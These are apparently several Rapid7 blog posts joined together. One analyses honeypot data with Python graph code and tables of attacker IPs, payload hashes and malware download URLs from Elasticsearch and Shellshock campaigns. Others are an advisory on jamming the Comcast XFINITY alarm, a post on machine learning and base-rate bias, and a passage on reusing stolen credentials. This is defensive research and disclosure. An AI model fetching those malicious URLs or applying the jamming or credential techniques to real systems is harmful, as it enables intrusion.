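          rec["sha1s"][e.get("sha1")] += 1
          rec["sensor_countries"][e.get("sensor.country_code")] += 1
          rec["dports"][e.get("dport")] += 1
          rec["vulns"][e.get("vulns")] += 1
      return list(attacks.values())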

 

For the sake of this post, let's focus on the attacks that led to downloadable files and that we could categorize as ShellShock / ElasticSearch exploits.

By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version):

 

+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key             | count | seen              | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 221.224.57.66   |   89  | first: 2015-08-05 |  54x US       |  89x 9200  |  89x GET   |  89x VULN-ELASTICSEARCH-RCE |  88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e |  84x http://183.56.173.131:999/xiaojiba                                        |
| CN              |       | last:  2015-08-08 |  14x JP       |            |            |      CVE-2014-3120          |   1x b6bb2b7cad3790887912b6a8d2203bebedb84427 |   4x http://221.224.57.66:999/xiaojiba                                         |
| AS 4134         |       |                   |  10x AU       |            |            |      EXEC-SHELLCMD          |                                               |   1x http://221.224.57.66:999/qqqq                                             |
|                 |       |                   |   5x IE       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   3x SG       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   3x BR       |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 61.147.103.74   |   87  | first: 2015-05-06 |  55x US       |  87x 9200  |  87x GET   |  87x VULN-ELASTICSEARCH-RCE |  87x f7b229a46b817776d9d2c1052a4ece2cb8970382 |  72x http://61.147.103.74/Aqks                                                 |
| CN              |       | last:  2015-05-27 |  15x SG       |            |            |      CVE-2014-3120          |                                               |  15x http://61.147.103.74/Aqmds                                                |
| AS23650         |       |                   |  11x AU       |            |            |      EXEC-SHELLCMD          |                                               |                                                                                |
|                 |       |                   |   4x JP       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   2x IE       |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 117.175.111.10  |   63  | first: 2015-10-26 |  21x IE       |  63x 9200  |  63x POST  |  63x VULN-ELASTICSEARCH-RCE |  48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 |  18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm         |
| CN              |       | last:  2015-10-27 |  11x US       |            |            |      CVE-2014-3120          |  15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e |  15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc          |
| AS 9808         |       |                   |   9x JP       |            |            |      EXEC-SHELLCMD          |                                               |  15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip          |
|                 |       |                   |   8x AU       |            |            |                             |                                               |   9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto          |
|                 |       |                   |   8x SG       |            |            |                             |                                               |   5x http://183.60.202.97:12100/mmml                                           |
|                 |       |                   |   6x BR       |            |            |                             |                                               |   1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt         |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 189.190.50.56   |   50  | first: 2015-11-05 |  23x US       |  50x 80    |  50x GET   |  50x VULN-SHELLSHOCK        |  37x 21762efb4df7cbb6b2331b34907817499f53be99 |  37x http://189.190.50.56/.b.gif                                               |
| MX              |       | last:  2015-12-02 |  22x AU       |            |            |      CVE-2014-6271          |   4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e |   4x http://189.190.50.56/b.gif                                                |
| AS 8151         |       |                   |   5x BR       |            |            |                             |   4x 3a33f909c486406773b06d8da3b57f530dd80de6 |   4x http://173.220.57.150/scans/ip75.tar                                      |
|                 |       |                   |               |            |            |                             |   3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 |   3x http://173.220.57.150/scans/dom66.tar                                     |
|                 |       |                   |               |            |            |                             |   2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 |   2x http://173.220.57.150/scans/php77.tar                                     |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
...
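
The formatting script itself mostly boils down to sorting the correlated records and handing the tallied fields to prettytable; a minimal sketch, assuming attack records shaped like the ones from the correlation sketch above:

  from prettytable import PrettyTable  # third-party package

  # "attacks" is assumed to be the list returned by correlate() in the sketch above.
  def top(counter, limit=2):
      return ", ".join("%dx %s" % (n, v) for v, n in counter.most_common(limit))

  table = PrettyTable(["key", "count", "first", "last", "sensorcountry", "url"])
  for rec in sorted(attacks, key=lambda r: r["count"], reverse=True):
      table.add_row([rec["source"], rec["count"], rec["first"][:10], rec["last"][:10],
                     top(rec["sensor_countries"]), top(rec["urls"])])
  print(table)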

 

With my test dataset of roughly 2000 “attacks with downloads”, this leads to 195 unique sources that make use of several drop URLs and payloads over the course of a couple of months.

 

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further.

 

The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple of binaries which are also used by another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points like an attacker IP, a file hash, a drop host IP/name, etc. can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories.

 

If you create a graph for our honeypot data set, it looks like this:

[Graph: connected subgraphs linking attack sources, payload hashes, and drop hosts in the honeypot data set]

 

So to categorize our incidents into attacker groups, we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads, and hosts contacted by the malware samples themselves (sadly, we didn't get to do this for all of them).

 

  import collections
  import json

  # DATA is assumed to be the list of correlated attack records described above.
  GRAPH = collections.defaultdict(set)

  def add_edge(fr, to):
    # undirected
    GRAPH[fr].add(to)
    GRAPH[to].add(fr)

  def graph_traversal(src):
    visited = set([src])
    queue = [src,]
    while queue:
        parent = queue.pop(0)
        children = GRAPH[parent]
        for child in children:
          if child not in visited:
            yield parent, child
            visited.add(child)
            queue.append(child)

  for e in DATA:
    src = ("source", e["source"])
    payload = ("payload", e["sha1"])
    payloadsrc = ("payloadsrc", e["url.netloc"])

    add_edge(src, payload)
    add_edge(payload, payloadsrc)

    for i in e.get("mal.tcplist", []):
      add_edge(payload, ("c2", i))

  n = 1
  seen = set()

  for src in set(e["source"] for e in DATA):
    if src in seen: continue

    members = set()
    indicators = set()

    for (ta, va), (tb, vb) in graph_traversal(("source", src)):
      if ta == "source": members.add(va)
      else: indicators.add((ta, va))
      if tb == "source": members.add(vb)
      else: indicators.add((tb, vb))

    print json.dumps(dict(members=list(members), indicators=list(indicators), group=n))
    n += 1
    seen |= members

 

This leads to 81 groups, as shown by the next table (full version):

 

+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key | count | seen              | source               | sourcecountry | srcasn        | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|   3 |  224  | first: 2015-04-09 | 144x 115.29.174.5    | 210x CN       | 144x AS37963  |  84x US       | 224x 9200  | 158x POST  | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af |  65x http://23.234.25.203:15826/udpg                                           |
|     |       | last:  2015-12-13 |  31x 222.186.21.201  |  14x KR       |  66x AS23650  |  44x IE       |            |  66x GET   |      CVE-2014-3120          |  81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 |  53x http://23.234.25.203:15826/dos                                            |
|     |       |                   |  14x 14.45.176.29    |               |  14x AS 4766  |  26x JP       |            |            |      EXEC-SHELLCMD          |                                               |  28x http://23.234.25.203:15826/udp                                            |
|     |       |                   |  14x 61.160.247.231  |               |               |  26x SG       |            |            |                             |                                               |  16x http://23.234.25.203:15826/ud                                             |
|     |       |                   |   8x 222.186.21.195  |               |               |  23x AU       |            |            |                             |                                               |  13x http://47.88.21.44:15826/udp                                              |
|     |       |                   |   7x 222.186.21.166  |               |               |  21x BR       |            |            |                             |                                               |   7x http://23.234.25.203:15826/xxoo                                           |
|     |       |                   |   5x 61.160.223.35   |               |               |               |            |            |                             |                                               |   7x http://61.160.223.35:15826/udp                                            |
|     |       |                   |   1x 222.186.34.70   |               |               |               |            |            |                             |                                               |   7x http://23.234.25.203:15826/L88                                            |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   6x http://23.234.25.203:15826/xf23                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   5x http://43.230.147.30:2017/udp                                             |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://61.160.247.231:15826/udp                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://23.234.25.203:15826/udp110                                         |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.50.47:15826/udpg                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.21.201:15826/udp                                           |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.34.70:2018/udp                                             |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|  12 |   23  | first: 2015-11-17 |   9x 206.217.134.130 |  19x US       |   9x AS36352  |  18x US       |  15x 80    |  15x GET   |  15x VULN-SHELLSHOCK        |   8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf |   8x http://192.240.106.106/lga                                                |
|     |       | last:  2015-12-13 |   4x 198.245.72.234  |   2x TR       |   4x AS55286  |   3x AU       |   8x 9200  |   8x POST  |      CVE-2014-6271          |   8x c30026c548cd45be89c4fb01aa6df6fd733de964 |   2x http://69.30.200.250/ide.docx                                             |
|     |       |                   |   4x 69.12.70.34     |   1x CA       |   4x AS 8100  |   1x JP       |            |            |   8x VULN-ELASTICSEARCH-RCE |   5x fe01a972a63f754fed0322698e16b2edc933f422 |   2x http://188.138.41.134/dd.exe                                              |
|     |       |                   |   2x 91.191.170.111  |   1x DE       |   2x AS43391  |   1x BR       |            |            |      CVE-2014-3120          |   2x 05f32da77a9c70f429c35828d73d68696ca844f2 |   2x http://37.59.8.213/pacs                                                   |
|     |       |                   |   1x 142.54.187.42   |               |   1x AS30083  |               |            |            |      EXEC-SHELLCMD          |                                               |   2x http://69.30.200.250/jof                                                  |
|     |       |                   |   1x 209.126.110.239 |               |   1x AS32613  |               |            |            |                             |                                               |   1x http://69.58.3.226/api                                                    |
|     |       |                   |   1x 174.142.46.120  |               |   1x AS24940  |               |            |            |                             |                                               |   1x http://192.240.106.106/dax.exe                                            |
|     |       |                   |   1x 136.243.110.172 |               |   1x AS33387  |               |            |            |                             |                                               |   1x http://174.142.46.120/lma1                                                |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.12.70.34/api                                                    |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://188.138.41.134/lma1                                                |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://192.240.106.106/pisd                                               |
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.30.200.250/jla.cp                                               |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
|  13 |   42  | first: 2015-04-23 |  22x 104.192.0.18    |  22x US       |  22x AS27176  |  14x US       |  21x 10000 |  42x GET   |  42x VULN-QNAP-SHELLSHOCK   |  12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 |  20x http://104.192.0.18/apache                                                |
|     |       | last:  2015-04-27 |  20x 37.220.36.77    |  20x NL       |  20x AS58073  |  10x IE       |  18x 7778  |            |                             |  12x 3e4e34a51b157e5365caa904cbddc619146ae65c |  12x http://104.192.0.18/syn                                                   |
|     |       |                   |                      |               |               |   8x SG       |   3x 8080  |            |                             |   7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 |   7x http://104.192.0.18/apache2                                               |
|     |       |                   |                      |               |               |   7x BR       |            |            |                             |   7x 9851bcec479204f47a3642177c75a16b58d44c20 |   3x http://104.192.0.18/jawk                                                  |
|     |       |                   |                      |               |               |   3x AU       |            |            |                             |   3x 1a412791a58dca7fc87284e208365d36d19fd864 |                                                                                |
|     |       |                   |                      |               |               |               |            |            |                             |   1x d538717c89943f42716c139426c031a21b83c236 |                                                                                |
...

 

What else?

As mentioned before, this can be done in much more detail by analyzing the samples further and extracting more (and better) indicators than just the contacted C2 hosts. There is also probably more data around the hosts/domains used for the drop sites (payload URLs) that could be used to correlate different sets. If we take some of the hosts/IPs from above and use them to query Project Sonar, we get DNS records, open ports, and certificate information:

 

address 104.152.190.2 had port 80/tcp open
address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com
address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com
saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465
address 89.238.81.138 was seen in DNS A record for www.investorfinder.de
address 97.74.204.6 was seen in DNS A record for teafortwohearts.com
address 115.238.246.180 had port 80/tcp open
address 66.240.252.49 had port 993/tcp open
address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca
address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl
address 180.97.215.7 was seen in DNS A record for jilijia.net
address 203.171.230.109 was seen in DNS A record for cxyt.org
elbinvestment.com had a DNS a record with value 89.31.143.1
address 222.186.30.21 was seen in DNS A record for www.lerhe.com
saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993
ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116
address 180.97.215.7 had port 995/tcp open
address 213.155.180.226 had port 465/tcp open
address 113.10.149.45 was seen in DNS A record for school88le.com
...

 

Following this data, or adding it into the graph, can yield some interesting results - but it is also of lower "quality": most of the infrastructure used by the attackers probably consists of compromised systems that see plenty of legitimate use, so there is a lot of noise around the attacker activity.
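To make that correlation step a bit more concrete, here is a minimal Python sketch of matching a handful of the C2/drop IPs observed above against a downloaded Sonar forward-DNS dump. The file name and the JSON field names (name, type, value) are assumptions about the dataset layout, so treat this as a starting point rather than a recipe:

  import gzip
  import json

  # A few of the C2 / drop-site IPs observed in the clusters above
  c2_ips = {"61.160.247.231", "222.186.21.195", "104.192.0.18"}

  # Hypothetical local copy of a Sonar forward-DNS (A record) dataset
  SONAR_FDNS = "fdns_a.json.gz"

  with gzip.open(SONAR_FDNS, "rt", encoding="utf-8", errors="replace") as fh:
      for line in fh:
          rec = json.loads(line)
          # Keep only A records whose resolved value is one of the IPs of interest
          if rec.get("type") == "a" and rec.get("value") in c2_ips:
              print(f"address {rec['value']} was seen in DNS A record for {rec['name']}")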

 

Summing up

Looking through these datasets can be fun, but also a bit tricky at times. Command-line kung fu and some scripting can help you pivot around the dataset if you don't want to put in the effort of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often fit the graph data model well, so we can use simple graph traversal functions or even a real graph database to analyze our data.
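As a small illustration of that graph idea, the sketch below (using the networkx library) links samples to the C2 URLs they contacted and pulls out connected components as candidate clusters. The indicator pairs are hypothetical placeholders for whatever you extract from your own sandbox runs and honeypot logs:

  import networkx as nx

  # Hypothetical (sample, C2 URL) pairs standing in for real extracted indicators
  edges = [
      ("sample_sha1_a", "http://c2-one.example/udp"),
      ("sample_sha1_b", "http://c2-one.example/udp"),
      ("sample_sha1_b", "http://c2-two.example/xxoo"),
      ("sample_sha1_c", "http://c2-three.example/apache"),
  ]

  G = nx.Graph()
  for sample, c2 in edges:
      # Tag the nodes so samples and C2s stay distinguishable in the graph
      G.add_edge(("sample", sample), ("c2", c2))

  # Each connected component is a candidate cluster of related activity
  for i, component in enumerate(nx.connected_components(G), start=1):
      samples = sorted(name for kind, name in component if kind == "sample")
      c2s = sorted(name for kind, name in component if kind == "c2")
      print(f"cluster {i}: samples={samples} c2s={c2s}")

The same shape of traversal works in a real graph database; the point is simply that shared infrastructure pulls otherwise separate samples into the same component.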

 

In order to analyze most of the samples, I implemented Linux support in Cuckoo Sandbox. It is available in the current development branch - follow us closely for the release of the next version!

 

Another noteworthy point is that honeypots can still yield some fun (if not always interesting) data nowadays. With internet scanning becoming more popular and easier to do, a number of low-skill, shotgun-style attackers are joining the game and trying to get quick wins by running mass exploitation campaigns.

 

Rapid7 Labs is always interested in similar stories if you are willing to share them, so let us know what you think in the comments!

Also feel free to tweet me personally @repmovsb.

 

Happy HaxMas!

-Mark

 

References:

[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog

[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ

[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

Summary

By creating a failure condition in the 2.4 GHz radio frequency band, the Comcast XFINITY Home Security System fails open, with the base station failing to recognize or alert on a communications failure with the component sensors. In addition, sensors take an inordinate amount of time to re-establish communications with the base station, even if their "closed" state is switched to "open" during the failure event.

 

Update: As of January 6, Comcast is working with Rapid7 to investigate the technical details of the disclosure and potential mitigations. They also flagged that Rapid7 attempted to disclose via invalid email addresses on the xfinity.net domain, and should instead have used "abuse@comcast.net." We acknowledge this and would like to apologize for the miscommunication.

 

Product Description

xfinity-armed-everything-is-cool.png

The Comcast XFINITY Home Security system is a remote-enabled home security system, consisting of a battery-powered base station and one or more battery-powered sensors, all using the open standard ZigBee wireless communication protocol.

 

Credit

This issue was discovered by Phil Bosco of Rapid7, Inc.

 

Exploitation

When a failure condition is caused in the 2.4 GHz radio frequency band, the security system does not fail closed and assume that an attack is underway. Instead, the system fails open, and continues to report that "All sensors are intact and all doors are closed. No motion is detected."

 

No duration of radio failure appears to be long enough to trigger a warning or other alert. In addition, the sensors take a significant amount of time to re-establish communication with the hub once the radio failure subsides.

 

To demonstrate the issue, the researcher placed a paired window/door sensor in tin foil shielding while the system was in an ARMED state, then removed the magnet from the sensor. The foil shielding simulated a radio jamming attack, and removing the magnet simulated opening the monitored door or window.

 

Once the magnet was removed, the sensor was unwrapped and placed within a few inches of the base station hub that controls the alarm system. The system continued to report that it was in an ARMED state. The amount of time it takes for the sensor to re-establish communications with the base station and correctly report that it is in an open state can range from several minutes up to three hours.

 

There are any number of techniques that could be used to cause interference or deauthentication of the underlying ZigBee-based communications protocol, such as commodity radio jamming equipment and software-based deauthentication attacks on the ZigBee protocol itself.

 

Mitigations

There are no practical mitigations to this issue. A software/firmware update appears to be required in order for the base station to determine how much radio interference to tolerate and for how long, and for sensors to re-establish communications with the base station more quickly.

 

Disclosure Timeline

 

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

 

  • Mon, Sep 28, 2015: Issue discovered by Phil Bosco of Rapid7
  • Wed, Sep 30, 2015: Internal review by Rapid7
  • Mon, Nov 02, 2015: Attempted to contact the vendor
  • Tue, Nov 23, 2015: Details disclosed to CERT, VU#418072 assigned
  • Tue, Jan 05, 2016: Public disclosure

This post is the eleventh in the series, "12 Days of HaXmas."

 

by Suchin Gururangan, Bob Rudis and the Rapid7 Data Science Team

 

Anomaly detection (i.e. identifying “badness”) and remediation is a hard and expensive process, fraught with false alarms and rabbit holes. The security community is keenly interested in developing and using data-driven tools to filter out noise and automatically detect malicious activity in large networks. While machine learning offers more flexibility than static, rule-based techniques, it is not a silver bullet. In this post, we will cover obstacles in applying machine learning to security and some ways to avoid them.

 

It’s All About the Data

One core concept in machine learning is that the algorithms being used are only as strong as the datasets they are trained on. What does this mean when applying machine learning techniques to cybersecurity?

 

This is a bit of an oversimplification, but we generally do one of two things with machine learning:

 

  1. Put a bunch of things together into unlabeled groups (unsupervised learning)
  2. Identify new things as being part of already known/labeled groups (classification)

 

Both actions are based on the features associated with each data element.

 

In security, we really want to be able to identify (or classify) a “thing” as good or bad. To do that, the first thing we need is labeled data.

 

At its core, this classification process is two-fold: first we train a model on known data, and then we test it on unknown samples. In particular, adaptable models require a continuous flow of labeled data to train with. Unfortunately, the creation of such labeled data is the most expensive and time-consuming part of the data science process. The data we have is usually messy, incomplete, and inconsistent. While there are many tools to experiment with different algorithms and their parameters, there are few tools to help one develop clean, comprehensive datasets. Oftentimes this means asking practitioners with deep domain expertise to help label existing data elements, which is a very expensive process. You can also try to purchase “good” data, but this can be hard to come by in the context of security (and may go stale very quickly). Another option is to use a combination of unsupervised and supervised learning called—unsurprisingly—semi-supervised learning [https://en.wikipedia.org/wiki/Semi-supervised_learning].
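As a minimal sketch of that train-then-test loop, here is what it might look like with scikit-learn; the feature matrix and labels are random stand-ins for whatever labeled data you manage to assemble:

  import numpy as np
  from sklearn.linear_model import LogisticRegression
  from sklearn.model_selection import train_test_split

  # Toy stand-in for labeled data: rows are feature vectors, y is 1 for "bad", 0 for "good"
  rng = np.random.default_rng(0)
  X = rng.normal(size=(1000, 10))
  y = (X[:, 0] + 0.5 * X[:, 1] > 1).astype(int)

  # Hold out a test set of "unknown" samples the model never sees during training
  X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

  model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
  print("held-out accuracy:", model.score(X_test, y_test))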

 

The creation of labeled data is the most expensive and time-consuming part of the data science process.

 

Regardless of your approach, it’s likely you’ll spend a great deal of time, effort, and/or money in your quest for labeled data.

 

The Need for Unbiased Data

Bias in training data can hamper a model's ability to discern between output classes. In the security context, data bias can be interpreted in two ways. First, attack methodologies are becoming more dynamic than ever before. If a predictive model is trained on known patterns and vulnerabilities (i.e. using features from malware that is file-system resident), it may not detect an unprecedented attack that does not conform to those trends (e.g. it misses features from malware that is only memory resident).

 

Bias can sneak up on you, as well. You may think you can use the Alexa listings to, say, obtain a list of benign domains, but that assumption may turn out to be a bad idea since there is no guarantee that those sites are clean. Getting good ground truth in security is hard.

 

Data bias also comes in the form of class representation. To understand class representation bias, one can look to a core foundation of statistics: Bayes’ theorem.

 

Bayes’ theorem describes the probability of event A given event B:

eq1.png

Expanding the probability P(B) for the set of two mutually exclusive outcomes, we arrive at the following equation:

eq2.png

Combining the above equations, we arrive at the following alternative statement of Bayes’ theorem:

 

eq3.png

What does this have to do with security? Let’s apply this theorem to a concrete problem to show the emergent issues of training predictive models on biased data.

 

Suppose company X has 1,000 employees, and a security vendor has deployed an intrusion detection system (IDS) that alerts company X when it detects a malicious URL sent to an employee’s inbox. Suppose there are 10 malicious URLs sent to employees of company X per day. Finally, suppose the IDS analyzes 10,000 incoming URLs to company X per day.

 

We’ll use:

 

  • I to denote an incident (i.e. an incoming malicious URL)
  • ¬I to denote a non-incident (i.e. an incoming benign URL)
  • A to denote an alarm (i.e. the IDS classifies incoming URL as malicious), and
  • ¬A to denote a non-alarm (the IDS classifies URL as benign).

 

That means:

eq4.png

What’s the probability that an alarm is associated with a real incident? Or, how much can we trust the IDS under these conditions?

 

Using Bayes’ Theorem from above, we know:

eq5.png

We don’t have to use the shorthand version, though:

eq6.png

Now let’s calculate the probability of an incident occurring (and not-occurring)—P(incident) and P(non-incident)—given the parameters of the IDS problem we defined above:

eq7.png

eq8.png

These probabilities emphasize the bias present in the distribution of analyzed URLs. The IDS has little sense of what makes up an incident, as it is trained on very few examples of it. Plugging the probabilities into the equation above, we find that:

eq9.png

To have reasonable confidence in an IDS under these biased conditions, we must have not only an unrealistically high hit rate, but also an unrealistically low false positive rate. That is, for an IDS to be 80 percent accurate, even with a best-case scenario of a 100 percent hit rate, the IDS's false alarm rate must be 4 × 10⁻⁴. In other words, only 4 out of 10,000 alarms can be false positives to achieve this accuracy.
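A quick way to get a feel for these numbers is to plug them straight into the formula. The short sketch below computes P(incident | alarm) for the scenario above; the 1 percent false alarm rate is an illustrative assumption, not a measured figure:

  def p_incident_given_alarm(hit_rate, false_alarm_rate, p_incident):
      """Bayes' theorem: P(I|A) = P(A|I)P(I) / (P(A|I)P(I) + P(A|~I)P(~I))."""
      p_non_incident = 1.0 - p_incident
      numerator = hit_rate * p_incident
      return numerator / (numerator + false_alarm_rate * p_non_incident)

  # 10 malicious URLs out of 10,000 analyzed per day
  p_incident = 10 / 10_000

  # Even with a perfect hit rate, a hypothetical 1% false alarm rate leaves
  # only about 9% of alarms corresponding to real incidents.
  print(p_incident_given_alarm(hit_rate=1.0, false_alarm_rate=0.01, p_incident=p_incident))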

 

Visualizing Accuracy

One way to actually “see” this is with a chart designed to visually depict the accuracy of our classifier (called a receiver operating characteristic—or, ROC—curve):

Picture1.png

From "Proper Use of ROC Curves in Intrusion/Anomaly Detection"

As we train, test and use a model, we want the ratio of true positives to false positives to be better than chance and also accurate enough to make it worthwhile using (in whatever context that happens to be).
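If you want to produce that kind of curve for your own classifier, scikit-learn will compute the points for you; the labels and scores below are synthetic placeholders for a real model's output:

  import numpy as np
  from sklearn.metrics import roc_auc_score, roc_curve

  # Synthetic ground-truth labels and classifier scores
  rng = np.random.default_rng(1)
  y_true = rng.integers(0, 2, size=500)
  scores = y_true * 0.6 + rng.normal(scale=0.5, size=500)  # noisy but informative

  fpr, tpr, thresholds = roc_curve(y_true, scores)
  print("AUC:", roc_auc_score(y_true, scores))
  # Plotting fpr against tpr (e.g. with matplotlib) gives the ROC curve itself.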

In the real world, detection hit rates are much lower and false alarm rates are much higher. Thus, class representation bias in the security context can make machine learning algorithms inaccurate and untrustworthy. When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable. Predictive algorithms run the risk of being "the boy who cried wolf" – annoying and prone to desensitizing security professionals to incident alerts[2]. The last thing you want to do is create a fancy new system that only exacerbates the alert fatigue problem that was identified at the core of the Target/Home Depot breaches.

 

“When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable.”

 

 

Avoiding the Pitfalls

Security data scientists can avoid these obstacles with a few measures:

 

  1. Train models with large and balanced data that are representative of all output classes. Take balanced subsamples of your data if necessary (see the sketch after this list) and use available techniques to get an understanding of the efficacy of your data sets.
  2. Focus on getting a plethora of labeled data. Amazon’s Mechanical Turk is one example of a useful tool for this, and it is used by many researchers outside of security. Look at open-sourced data, and encourage data-gathering expeditions.
  3. Encourage security expertise on the team. Domain expertise is crucial to the performance of machine learning algorithms applied in the security space. To keep up with the changing threat landscape, one must have security experience.
  4. Incorporate unsupervised methods into the solution of the data science problem. Focus on organization, presentation, visualization, filtering of data - not just prediction.  Check out this handy tutorial on self-taught learning by Stanford.
  5. Weigh the tradeoff of accuracy (i.e. getting all the “guesses” right) vs. coverage. You can think of this in terms of a Bloom filter. In the case of search, it’s more important that all the matching elements are returned even if that means some incorrect elements are returned. Depending on the application of your classification algorithm, you may be able to make similar tradeoffs.
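Here is a minimal sketch of the balanced subsampling mentioned in measure 1, using plain NumPy so the mechanics are visible; the class sizes are made up for illustration:

  import numpy as np

  rng = np.random.default_rng(42)

  # Heavily imbalanced toy data: 10,000 "benign" rows and 100 "malicious" rows
  X = rng.normal(size=(10_100, 5))
  y = np.array([0] * 10_000 + [1] * 100)

  # Undersample the majority class so both classes are equally represented
  minority_idx = np.flatnonzero(y == 1)
  majority_idx = np.flatnonzero(y == 0)
  keep_majority = rng.choice(majority_idx, size=minority_idx.size, replace=False)

  balanced_idx = np.concatenate([minority_idx, keep_majority])
  rng.shuffle(balanced_idx)

  X_balanced, y_balanced = X[balanced_idx], y[balanced_idx]
  print(np.bincount(y_balanced))  # -> [100 100]

Undersampling throws information away, so in practice you may prefer class weighting or oversampling the minority class instead; the point is simply to keep the model from learning that "predict benign" is almost always right.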

 

Machine learning has the potential to revolutionize how we detect and respond to malicious activity in our networks. It can weed out signal from noise to help incident responders focus on what’s truly important and help administrators discover patterns in network activity never seen before. However, when delving into applying these algorithms to security we must be aware of caveats of the approach, so we may overcome them.

 

This post is the tenth in the series, "The 12 Days of HaXmas."

 

What's your favorite exploit?

My favorite exploit is not an exploit at all. It's authenticated code execution by design.

 

As an attacker, what you're really looking for is the ability to control a system in all the same ways that a system's normal users and administrators do. Administrators need to examine attributes of the system such as the users that log into it, the software installed on it, the services running on it, and most importantly the data it is meant to process. All of which are important for attackers, too.

 

An exploit can give you that, but there are certain downsides. Exploits have the potential to crash servers or trigger IDS/IPS. They also have a half-life before they're patched out of existence. Sure, you'll still find an occasional Windows 2000 box vulnerable to everything, but they get rarer by the day. So what does the discerning hacker turn to?

 

As I've said before, my absolute favorite type of vulnerability is authenticated code execution by design. What I mean by that is taking advantage of services that already exist on a network for administrators and users to log in to and run commands or executables in the normal course of doing their job. Part of why it's my favorite is that it's not really a vulnerability -- it's just using the system how it was meant to be used.

 

How does the enterprising attacker get these credentials, you ask? Talk to any penetration tester and they'll give you a list of their favorite ways. Most of those lists will include mimikatz but it is not the only thing by any means. Many tools and devices leave creds lying around in plaintext (or an obfuscated plaintext equivalent) all over the place. If an attacker can't find credentials, they're usually easy to guess. I would guess that as the size of an organization increases, the probability of at least one user having a password like "Summer2015" approaches 1. Suffice it to say that once an attacker has a foothold into an organization, the credentials will rain down in a flood of access.

 

Ok, I see your point, where do I use all these stolen credentials?

 

